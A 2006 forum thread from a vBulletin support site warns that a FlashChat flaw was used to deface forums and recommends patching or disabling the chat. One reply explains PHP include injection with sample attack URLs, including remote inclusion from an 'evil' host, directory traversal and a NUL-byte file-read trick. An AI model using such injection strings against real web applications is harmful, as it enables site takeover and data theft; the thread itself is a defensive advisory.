Go Back   vBulletin Setup > General Forums > Official vBulletin Announcements

Why not Register and remove some of the ads from vBulletin Setup
Post New Thread  Reply



1 links from elsewhere to this Post. Click to view. #1   09-01-2006, 11:40 PM
Send a message via AIM to Brandon Send a message via MSN to Brandon Send a message via Yahoo to Brandon Brandon is a glorious beacon of lightBrandon is a glorious beacon of lightBrandon is a glorious beacon of lightBrandon is a glorious beacon of light Join Date: Jul 2006 Posts: 9,242 Location: Topeka, KS
FlashChat Vulnerability


Today, we have had several support tickets in regards to defaced vBulletin forums. Upon investigation of the weblogs, we've determined that a vulnerability exists in FlashChat v4.5.7 (at least) that is being exploited. It appears that a securityfocus exploit was published for this on June 16.

Any customers that have FlashChat installed on their servers should verify that their copy is secure by contacting the vendor.

More...
Quote   |  



#2   09-03-2006, 03:47 AM
The Alchemist will become famous soon enough Join Date: Sep 2006 Posts: 3
Re: FlashChat Vulnerability


I don't really see how a bug in a chat room could be exploited o.O?

But my copy is all good, I'm pretty sure.
Quote   |  



#3   09-03-2006, 10:03 AM
Send a message via AIM to Brandon Send a message via MSN to Brandon Send a message via Yahoo to Brandon Brandon is a glorious beacon of lightBrandon is a glorious beacon of lightBrandon is a glorious beacon of lightBrandon is a glorious beacon of light Join Date: Jul 2006 Posts: 9,242 Location: Topeka, KS
Re: FlashChat Vulnerability


do you use flash chat ?
when I was using phpbb2 there were some exploits that could be injected in the chat mods.. I'm sure this is the same way..

If your using flash chat on your vb site, I'd disable it until a patch is discovered..
--------------------
Brandon Sheley / vBulletin Setup Staff
Check out our Newsletter for the latest vB and SEO news.
Are you looking for vBulletin work to be done on your forums ?
Would you like to Help Support vBulletin Setup.
Reply to the Welcome PM for Full Access to the Forums.. Thanks

Please do not PM me for support, that's what the forums are for.
Have you heard about Crowdgather?
Find it on Forums
Check out this cool page - Bar Code Signatures
Quote   |  



#4   10-28-2006, 01:22 AM
mikesz will become famous soon enough Join Date: Oct 2006 Posts: 6
Re: FlashChat Vulnerability


The Alchemist,

The guys at Flashchat have plugged this hole in their current stuff but if you are running an older version of flashchat, you can absolutely and positively get hijacked with an include files injection. I just read a post over at Tufat that reported a huge system problem becuase the hacker was able to use do an injection on an include file for one of the CMSes of a product that wasn't even running on the reporters system.

The vulnerability has to do with being able to access an include file (with no validation mechanism) directly from the browser and being able to "inject" and execute a command to allow access to the system or other nefarious activity. Browsers generally can not can not display php code but they can execute it. The hackers know about sending a command stream through on include files that have not data verification mechanism and that is the key that unlocks the door for them.

According to Code injection - Wikipedia, the free encyclopedia

Here are some of the ways they do it:

* /vulnerable.php?COLOR=http://evil/exploit - injects a remotely hosted file containing an exploit.
* /vulnerable.php?COLOR=C:\ftp\upload\exploit - injects an uploaded file containing an exploit.
* /vulnerable.php?COLOR=..\..\..\..\ftp\upload\exploi t - injects an uploaded file containing an exploit, using directory traversal.
* /vulnerable.php?COLOR=C:\notes.txt%00 - example using NUL meta character to remove the .php suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

If you are interested, do a search for "code injection vulnerability" you'll be surprised at how much stuff you can find on the web about it.

The fix is very simple for the flashchat one and can be back ported easy enough if you can't upgrade, but upgrading is a much better recommedation.

The current version of flashchat at this is written is 4.75

regards,
mikesz, webmaster
AllAboutDatingSites.com
Quote   |  
Post New Thread  Reply
vBulletin Setup > General Forums > Official vBulletin Announcements


Thread Tools
Display Modes

 
Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

LinkBacks (?)
LinkBack to this Thread: http://forum.vbulletinsetup.com/f23/flashchat-vulnerability-215.html
Posted By For Type Date
ATTN Lud - Important!! - NSX Prime This thread Refback 11-11-2006 11:32 AM

Similar Threads
Thread Thread Starter Forum Replies Last Post
Better chat room than Flashchat? Luigi vBulletin Hacks - Modifications 23 02-11-2008 03:08 PM
FlashChat Installation? Denovo vBulletin Questions 7 02-17-2007 03:05 AM


All times are GMT -6. The time now is 08:38 AM.

vBulletin Setup, vBulletin Setup Forums, vBulletin Services, vBulletin Blogs, vBulletin SEO, vBulletin Questions, vBulletin Skins, Styles, Templates
vBulletin Hacks / Modifications, vBulletin Monetization, Blogs, vBulletin Link Directory,Quality Link Directory